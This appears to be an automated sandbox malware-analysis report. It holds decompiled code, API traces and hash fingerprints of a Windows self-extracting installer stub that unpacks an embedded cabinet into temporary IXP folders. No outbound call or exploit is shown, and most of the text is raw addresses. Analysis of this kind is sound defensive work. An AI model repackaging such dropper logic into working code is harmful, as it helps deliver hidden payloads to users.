                                                          0x01095bd8
                                                          0x01095bde
                                                          0x01095be3
                                                          0x01095bec
                                                          0x01095bf0
                                                          0x01095bfc
                                                          0x01095c02
                                                          0x01095c02
                                                          0x01095c02
                                                          0x01095c04
                                                          0x01095c04
                                                          0x00000000
                                                          0x01095c04
                                                          0x01095a27
                                                          0x01095a3a
                                                          0x01095a46
                                                          0x01095a48
                                                          0x01095a4a
                                                          0x00000000
                                                          0x00000000
                                                          0x01095a64
                                                          0x01095a6a
                                                          0x01095a6c
                                                          0x01095abc
                                                          0x01095ac2
                                                          0x01095ac9
                                                          0x01095aca
                                                          0x01095aca
                                                          0x01095acc
                                                          0x01095acc
                                                          0x01095acf
                                                          0x01095ad1
                                                          0x00000000
                                                          0x00000000
                                                          0x01095ad3
                                                          0x01095ad6
                                                          0x01095ad8
                                                          0x00000000
                                                          0x00000000
                                                          0x01095ada
                                                          0x01095adc
                                                          0x01095add
                                                          0x01095add
                                                          0x01095ae0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095ae0
                                                          0x01095ae2
                                                          0x01095ae4
                                                          0x01095ae6
                                                          0x01095ae6
                                                          0x01095ae6
                                                          0x01095ae9
                                                          0x01095aeb
                                                          0x01095af0
                                                          0x01095af6
                                                          0x01095af8
                                                          0x01095af9
                                                          0x01095af9
                                                          0x01095afb
                                                          0x00000000
                                                          0x00000000
                                                          0x01095afd
                                                          0x01095aff
                                                          0x01095b00
                                                          0x01095b03
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095b03
                                                          0x01095b05
                                                          0x01095b08
                                                          0x01095b20
                                                          0x01095b27
                                                          0x01095b52
                                                          0x01095b52
                                                          0x01095b5b
                                                          0x01095b62
                                                          0x01095b6b
                                                          0x01095b6d
                                                          0x01095b76
                                                          0x01095b7d
                                                          0x01095b83
                                                          0x01095b7f
                                                          0x01095b7f
                                                          0x01095b7f
                                                          0x01095b6f
                                                          0x01095b72
                                                          0x01095b72
                                                          0x01095b85
                                                          0x01095b98
                                                          0x01095b9e
                                                          0x01095b87
                                                          0x01095b8f
                                                          0x01095b8f
                                                          0x00000000
                                                          0x01095b85
                                                          0x01095b29
                                                          0x01095b33
                                                          0x00000000
                                                          0x00000000
                                                          0x01095b35
                                                          0x01095b48
                                                          0x01095b4a
                                                          0x00000000
                                                          0x01095b4a
                                                          0x01095b0f
                                                          0x01095b16
                                                          0x00000000
                                                          0x01095b16
                                                          0x01095a7c
                                                          0x01095a8a
                                                          0x01095aa5
                                                          0x01095aab
                                                          0x00000000
                                                          0x010959bb
                                                          0x010959c0
                                                          0x010959c7
                                                          0x010959d1
                                                          0x010959d6
                                                          0x01095c05
                                                          0x01095c14
                                                          0x01095c14

                                                          APIs
                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010959A8
                                                          • SetCurrentDirectoryA.KERNELBASE(?), ref: 010959AF
                                                          • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 01095A13
                                                          • MulDiv.KERNEL32(?,?,00000400), ref: 01095A40
                                                          • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01095A64
                                                          • memset.MSVCRT ref: 01095A7C
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01095A98
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 01095AA5
                                                          • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 01095BFC
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                          • String ID:
                                                          • API String ID: 4237285672-0
                                                          • Opcode ID: 8e1959767452908d3a9949a946dc28dfb8af915a06570f89641a8da35139c46a
                                                          • Instruction ID: c16a9851f7d7e7c0f2b63510265d41ee41ed08a15d76811c0cf0c42446e54776
                                                          • Opcode Fuzzy Hash: 8e1959767452908d3a9949a946dc28dfb8af915a06570f89641a8da35139c46a
                                                          • Instruction Fuzzy Hash: D27193B1A0020CAFEF269B25CCA5BFA77ACFB48344F0440AAF585D3144DA399E459F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 1094fe0-109501a call 109468f FindResourceA LoadResource LockResource 377 1095161-1095163 374->377 378 1095020-1095027 374->378 379 1095029-1095051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 1095057-109505e call 1094efd 378->380 379->380 383 109507c-10950b4 380->383 384 1095060-1095077 call 10944b9 380->384 389 10950e8-1095104 call 10944b9 383->389 390 10950b6-10950da 383->390 388 1095107-109510e 384->388 391 109511d-109511f 388->391 392 1095110-1095117 FreeResource 388->392 398 1095106 389->398 390->398 402 10950dc 390->402 394 109513a-1095141 391->394 395 1095121-1095127 391->395 392->391 400 109515f 394->400 401 1095143-109514a 394->401 395->394 399 1095129-1095135 call 10944b9 395->399 398->388 399->394 400->377 401->400 404 109514c-1095159 SendMessageA 401->404 405 10950e3-10950e6 402->405 404->400 405->389 405->398
                                                          C-Code - Quality: 77%
                                                          			E01094FE0(void* __edi, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* _t8;
                                                          				struct HWND__* _t9;
                                                          				int _t10;
                                                          				void* _t12;
                                                          				struct HWND__* _t24;
                                                          				struct HWND__* _t27;
                                                          				intOrPtr _t29;
                                                          				void* _t33;
                                                          				int _t34;
                                                          				CHAR* _t36;
                                                          				int _t37;
                                                          				intOrPtr _t47;
                                                          
                                                          				_t33 = __edi;
                                                          				_t36 = "CABINET";
                                                          				 *0x1099144 = E0109468F(_t36, 0, 0);
                                                          				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                          				 *0x1099140 = _t8;
                                                          				if(_t8 == 0) {
                                                          					return _t8;
                                                          				}
                                                          				_t9 =  *0x1098584; // 0x0
                                                          				if(_t9 != 0) {
                                                          					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                          					ShowWindow(GetDlgItem( *0x1098584, 0x841), 5);
                                                          				}
                                                          				_t10 = E01094EFD(0, 0);
                                                          				if(_t10 != 0) {
                                                          					__imp__#20(E01094CA0, E01094CC0, E01094980, E01094A50, E01094AD0, E01094B60, E01094BC0, 1, 0x1099148, _t33);
                                                          					_t34 = _t10;
                                                          					if(_t34 == 0) {
                                                          						L8:
                                                          						_t29 =  *0x1099148; // 0x0
                                                          						_t24 =  *0x1098584; // 0x0
                                                          						E010944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                          						_t37 = 0;
                                                          						L9:
                                                          						goto L10;
                                                          					}
                                                          					__imp__#22(_t34, "*MEMCAB", 0x1091140, 0, E01094CD0, 0, 0x1099140); // executed
                                                          					_t37 = _t10;
                                                          					if(_t37 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					__imp__#23(_t34); // executed
                                                          					if(_t10 != 0) {
                                                          						goto L9;
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					_t27 =  *0x1098584; // 0x0
                                                          					E010944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                          					_t37 = 0;
                                                          					L10:
                                                          					_t12 =  *0x1099140; // 0x0
                                                          					if(_t12 != 0) {
                                                          						FreeResource(_t12);
                                                          						 *0x1099140 = 0;
                                                          					}
                                                          					if(_t37 == 0) {
                                                          						_t47 =  *0x10991d8; // 0x0
                                                          						if(_t47 == 0) {
                                                          							E010944B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                          						}
                                                          					}
                                                          					if(( *0x1098a38 & 0x00000001) == 0 && ( *0x1099a34 & 0x00000001) == 0) {
                                                          						SendMessageA( *0x1098584, 0xfa1, _t37, 0);
                                                          					}
                                                          					return _t37;
                                                          				}
                                                          			}
















                                                          0x01094fe0
                                                          0x01094fe6
                                                          0x01094ff9
                                                          0x0109500d
                                                          0x01095013
                                                          0x0109501a
                                                          0x01095163
                                                          0x01095163
                                                          0x01095020
                                                          0x01095027
                                                          0x01095037
                                                          0x01095051
                                                          0x01095051
                                                          0x01095057
                                                          0x0109505e
                                                          0x010950a7
                                                          0x010950ad
                                                          0x010950b4
                                                          0x010950e8
                                                          0x010950e8
                                                          0x010950ee
                                                          0x010950ff
                                                          0x01095104
                                                          0x01095106
                                                          0x00000000
                                                          0x01095106
                                                          0x010950cd
                                                          0x010950d3
                                                          0x010950da
                                                          0x00000000
                                                          0x00000000
                                                          0x010950dd
                                                          0x010950e6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095060
                                                          0x01095060
                                                          0x01095070
                                                          0x01095075
                                                          0x01095107
                                                          0x01095107
                                                          0x0109510e
                                                          0x01095111
                                                          0x01095117
                                                          0x01095117
                                                          0x0109511f
                                                          0x01095121
                                                          0x01095127
                                                          0x01095135
                                                          0x01095135
                                                          0x01095127
                                                          0x01095141
                                                          0x01095159
                                                          0x01095159
                                                          0x00000000
                                                          0x0109515f

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01094FFE
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 01095006
                                                          • LockResource.KERNEL32(00000000), ref: 0109500D
                                                          • GetDlgItem.USER32(00000000,00000842), ref: 01095030
                                                          • ShowWindow.USER32(00000000), ref: 01095037
                                                          • GetDlgItem.USER32(00000841,00000005), ref: 0109504A
                                                          • ShowWindow.USER32(00000000), ref: 01095051
                                                          • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 01095111
                                                          • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 01095159
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                          • String ID: *MEMCAB$CABINET
                                                          • API String ID: 1305606123-2642027498
                                                          • Opcode ID: 97161b78e21137226e353643c25778e96eaa76e76d195ad2e2803df533e79281
                                                          • Instruction ID: 00f60cad531c6dfff0cfc1002feef0167ff12ba5830af5e2d5389626bb276a70
                                                          • Opcode Fuzzy Hash: 97161b78e21137226e353643c25778e96eaa76e76d195ad2e2803df533e79281
                                                          • Instruction Fuzzy Hash: DF3115F0740305ABEF311A27ADB9F673A9CB748799F00405EB9C1E6299D67E8C01A760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 95%
                                                          			E010953A1(CHAR* __ecx, CHAR* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t5;
                                                          				long _t13;
                                                          				int _t14;
                                                          				CHAR* _t20;
                                                          				int _t29;
                                                          				int _t30;
                                                          				CHAR* _t32;
                                                          				signed int _t33;
                                                          				void* _t34;
                                                          
                                                          				_t5 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t5 ^ _t33;
                                                          				_t32 = __edx;
                                                          				_t20 = __ecx;
                                                          				_t29 = 0;
                                                          				while(1) {
                                                          					E0109171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                          					_t34 = _t34 + 0x10;
                                                          					_t29 = _t29 + 1;
                                                          					E01091680(_t32, 0x104, _t20);
                                                          					E0109658A(_t32, 0x104,  &_v268); // executed
                                                          					RemoveDirectoryA(_t32); // executed
                                                          					_t13 = GetFileAttributesA(_t32); // executed
                                                          					if(_t13 == 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					if(_t29 < 0x190) {
                                                          						continue;
                                                          					}
                                                          					L3:
                                                          					_t30 = 0;
                                                          					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                          						_t30 = 1;
                                                          						DeleteFileA(_t32);
                                                          						CreateDirectoryA(_t32, 0);
                                                          					}
                                                          					L5:
                                                          					return E01096CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                          				}
                                                          				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                          				if(_t14 == 0) {
                                                          					goto L3;
                                                          				}
                                                          				_t30 = 1;
                                                          				 *0x1098a20 = 1;
                                                          				goto L5;
                                                          			}

















                                                          0x010953ac
                                                          0x010953b3
                                                          0x010953b9
                                                          0x010953bb
                                                          0x010953bd
                                                          0x010953bf
                                                          0x010953d1
                                                          0x010953d6
                                                          0x010953e0
                                                          0x010953e2
                                                          0x010953f5
                                                          0x010953fb
                                                          0x01095402
                                                          0x0109540b
                                                          0x00000000
                                                          0x00000000
                                                          0x01095413
                                                          0x00000000
                                                          0x00000000
                                                          0x01095415
                                                          0x01095416
                                                          0x01095427
                                                          0x0109542a
                                                          0x0109542b
                                                          0x01095434
                                                          0x01095434
                                                          0x0109543a
                                                          0x0109544c
                                                          0x0109544c
                                                          0x01095452
                                                          0x0109545a
                                                          0x00000000
                                                          0x00000000
                                                          0x0109545e
                                                          0x0109545f
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0109171E: _vsnprintf.MSVCRT ref: 01091750
                                                          • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010953FB
                                                          • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095402
                                                          • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109541F
                                                          • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109542B
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095434
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095452
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                          • API String ID: 1082909758-2310010875
                                                          • Opcode ID: f7560c7c271cc161f48cf0843876d7612bb9360c6de1bf034d4c00e3e2e64c00
                                                          • Instruction ID: 714666c20b13293f1ceca7f7a94448d332af37ba3204214bace2d4d38535b245
                                                          • Opcode Fuzzy Hash: f7560c7c271cc161f48cf0843876d7612bb9360c6de1bf034d4c00e3e2e64c00
                                                          • Instruction Fuzzy Hash: 1B110871700104A7EB619B269C68FEF7A6DFBD5321F004156B6C6D3180CE7A894297A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 478 1095467-1095484 479 109548a-1095490 call 10953a1 478->479 480 109551c-1095528 call 1091680 478->480 483 1095495-1095497 479->483 484 109552d-1095539 call 10958c8 480->484 485 109549d-10954c0 call 1091781 483->485 486 1095581-1095583 483->486 493 109553b-1095545 CreateDirectoryA 484->493 494 109554d-1095552 484->494 495 109550c-109551a call 109658a 485->495 496 10954c2-10954d8 GetSystemInfo 485->496 489 109558d-109559d call 1096ce0 486->489 498 1095577-109557c call 1096285 493->498 499 1095547 493->499 500 1095585-109558b 494->500 501 1095554-1095557 call 109597d 494->501 495->484 504 10954da-10954dd 496->504 505 10954fe 496->505 498->486 499->494 500->489 511 109555c-109555e 501->511 509 10954df-10954e2 504->509 510 10954f7-10954fc 504->510 512 1095503-1095507 call 109658a 505->512 513 10954f0-10954f5 509->513 514 10954e4-10954e7 509->514 510->512 511->500 515 1095560-1095566 511->515 512->495 513->512 514->495 517 10954e9-10954ee 514->517 515->486 518 1095568-1095575 RemoveDirectoryA 515->518 517->512 518->486
                                                          C-Code - Quality: 75%
                                                          			E01095467(CHAR* __ecx, void* __edx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _SYSTEM_INFO _v304;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t10;
                                                          				void* _t13;
                                                          				intOrPtr _t14;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				signed int _t26;
                                                          				void* _t28;
                                                          				void* _t29;
                                                          				CHAR* _t48;
                                                          				signed int _t49;
                                                          				intOrPtr _t61;
                                                          
                                                          				_t10 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t10 ^ _t49;
                                                          				_push(__ecx);
                                                          				if(__edx == 0) {
                                                          					_t48 = 0x10991e4;
                                                          					_t42 = 0x104;
                                                          					E01091680(0x10991e4, 0x104);
                                                          					L14:
                                                          					_t13 = E010958C8(_t48); // executed
                                                          					if(_t13 != 0) {
                                                          						L17:
                                                          						_t42 = _a4;
                                                          						if(_a4 == 0) {
                                                          							L23:
                                                          							 *0x1099124 = 0;
                                                          							_t14 = 1;
                                                          							L24:
                                                          							return E01096CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                          						}
                                                          						_t16 = E0109597D(_t48, _t42, 1, 0); // executed
                                                          						if(_t16 != 0) {
                                                          							goto L23;
                                                          						}
                                                          						_t61 =  *0x1098a20; // 0x0
                                                          						if(_t61 != 0) {
                                                          							 *0x1098a20 = 0;
                                                          							RemoveDirectoryA(_t48);
                                                          						}
                                                          						L22:
                                                          						_t14 = 0;
                                                          						goto L24;
                                                          					}
                                                          					if(CreateDirectoryA(_t48, 0) == 0) {
                                                          						 *0x1099124 = E01096285();
                                                          						goto L22;
                                                          					}
                                                          					 *0x1098a20 = 1;
                                                          					goto L17;
                                                          				}
                                                          				_t42 =  &_v268;
                                                          				_t20 = E010953A1(__ecx,  &_v268); // executed
                                                          				if(_t20 == 0) {
                                                          					goto L22;
                                                          				}
                                                          				_push(__ecx);
                                                          				_t48 = 0x10991e4;
                                                          				E01091781(0x10991e4, 0x104, __ecx,  &_v268);
                                                          				if(( *0x1099a34 & 0x00000020) == 0) {
                                                          					L12:
                                                          					_t42 = 0x104;
                                                          					E0109658A(_t48, 0x104, 0x1091140);
                                                          					goto L14;
                                                          				}
                                                          				GetSystemInfo( &_v304);
                                                          				_t26 = _v304.dwOemId & 0x0000ffff;
                                                          				if(_t26 == 0) {
                                                          					_push("i386");
                                                          					L11:
                                                          					E0109658A(_t48, 0x104);
                                                          					goto L12;
                                                          				}
                                                          				_t28 = _t26 - 1;
                                                          				if(_t28 == 0) {
                                                          					_push("mips");
                                                          					goto L11;
                                                          				}
                                                          				_t29 = _t28 - 1;
                                                          				if(_t29 == 0) {
                                                          					_push("alpha");
                                                          					goto L11;
                                                          				}
                                                          				if(_t29 != 1) {
                                                          					goto L12;
                                                          				}
                                                          				_push("ppc");
                                                          				goto L11;
                                                          			}




















                                                          0x01095472
                                                          0x01095479
                                                          0x01095481
                                                          0x01095484
                                                          0x0109551c
                                                          0x01095521
                                                          0x01095528
                                                          0x0109552d
                                                          0x0109552f
                                                          0x01095539
                                                          0x0109554d
                                                          0x0109554d
                                                          0x01095552
                                                          0x01095585
                                                          0x01095585
                                                          0x0109558b
                                                          0x0109558d
                                                          0x0109559d
                                                          0x0109559d
                                                          0x01095557
                                                          0x0109555e
                                                          0x00000000
                                                          0x00000000
                                                          0x01095560
                                                          0x01095566
                                                          0x01095569
                                                          0x0109556f
                                                          0x0109556f
                                                          0x01095581
                                                          0x01095581
                                                          0x00000000
                                                          0x01095581
                                                          0x01095545
                                                          0x0109557c
                                                          0x00000000
                                                          0x0109557c
                                                          0x01095547
                                                          0x00000000
                                                          0x01095547
                                                          0x0109548a
                                                          0x01095490
                                                          0x01095497
                                                          0x00000000
                                                          0x00000000
                                                          0x0109549d
                                                          0x010954ab
                                                          0x010954b4
                                                          0x010954c0
                                                          0x0109550c
                                                          0x01095511
                                                          0x01095515
                                                          0x00000000
                                                          0x01095515
                                                          0x010954c9
                                                          0x010954d6
                                                          0x010954d8
                                                          0x010954fe
                                                          0x01095503
                                                          0x01095507
                                                          0x00000000
                                                          0x01095507
                                                          0x010954da
                                                          0x010954dd
                                                          0x010954f7
                                                          0x00000000
                                                          0x010954f7
                                                          0x010954df
                                                          0x010954e2
                                                          0x010954f0
                                                          0x00000000
                                                          0x010954f0
                                                          0x010954e7
                                                          0x00000000
                                                          0x00000000
                                                          0x010954e9
                                                          0x00000000

                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010954C9
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109553D
                                                          • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109556F
                                                            • Part of subcall function 010953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010953FB
                                                            • Part of subcall function 010953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095402
                                                            • Part of subcall function 010953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109541F
                                                            • Part of subcall function 010953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109542B
                                                            • Part of subcall function 010953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095434
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                          • API String ID: 1979080616-1000730752
                                                          • Opcode ID: d73618a243827f08b588861916894ae5c7771f2f82a2e3daeb534a342ea6b33f
                                                          • Instruction ID: a89338b40a6b64d7c2bb818f405d5fa6ca6206f47e455d2da243c00b75e7910a
                                                          • Opcode Fuzzy Hash: d73618a243827f08b588861916894ae5c7771f2f82a2e3daeb534a342ea6b33f
                                                          • Instruction Fuzzy Hash: F33169B0B002069BDF629F3F9C745BE77EABB85214B0441AFE9C6D3245CB75CA01A794
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 519 109256d-109257d 520 1092583-1092589 519->520 521 1092622-1092627 call 10924e0 519->521 523 10925e8-1092607 RegOpenKeyExA 520->523 524 109258b 520->524 528 1092629-109262f 521->528 525 1092609-1092620 RegQueryInfoKeyA 523->525 526 10925e3-10925e6 523->526 524->528 529 1092591-1092595 524->529 530 10925d1-10925dd RegCloseKey 525->530 526->528 529->528 531 109259b-10925ba RegOpenKeyExA 529->531 530->526 531->526 532 10925bc-10925cb RegQueryValueExA 531->532 532->530
                                                          C-Code - Quality: 86%
                                                          			E0109256D(signed int __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				signed int _t13;
                                                          				signed int _t19;
                                                          				long _t24;
                                                          				void* _t26;
                                                          				int _t31;
                                                          				void* _t34;
                                                          
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t13 = __ecx & 0x0000ffff;
                                                          				_t31 = 0;
                                                          				if(_t13 == 0) {
                                                          					_t31 = E010924E0(_t26);
                                                          				} else {
                                                          					_t34 = _t13 - 1;
                                                          					if(_t34 == 0) {
                                                          						_v8 = 0;
                                                          						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                          							goto L7;
                                                          						} else {
                                                          							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                          							goto L6;
                                                          						}
                                                          						L12:
                                                          					} else {
                                                          						if(_t34 > 0 && __ecx <= 3) {
                                                          							_v8 = 0;
                                                          							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                          							if(_t24 == 0) {
                                                          								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                          								L6:
                                                          								asm("sbb eax, eax");
                                                          								_v8 = _v8 &  !( ~_t19);
                                                          								RegCloseKey(_v12); // executed
                                                          							}
                                                          							L7:
                                                          							_t31 = _v8;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t31;
                                                          				goto L12;
                                                          			}











                                                          0x01092572
                                                          0x01092573
                                                          0x01092575
                                                          0x01092578
                                                          0x0109257d
                                                          0x01092627
                                                          0x01092583
                                                          0x01092586
                                                          0x01092589
                                                          0x010925eb
                                                          0x01092607
                                                          0x00000000
                                                          0x01092609
                                                          0x0109261a
                                                          0x00000000
                                                          0x0109261a
                                                          0x00000000
                                                          0x0109258b
                                                          0x0109258b
                                                          0x0109259e
                                                          0x010925b2
                                                          0x010925ba
                                                          0x010925cb
                                                          0x010925d1
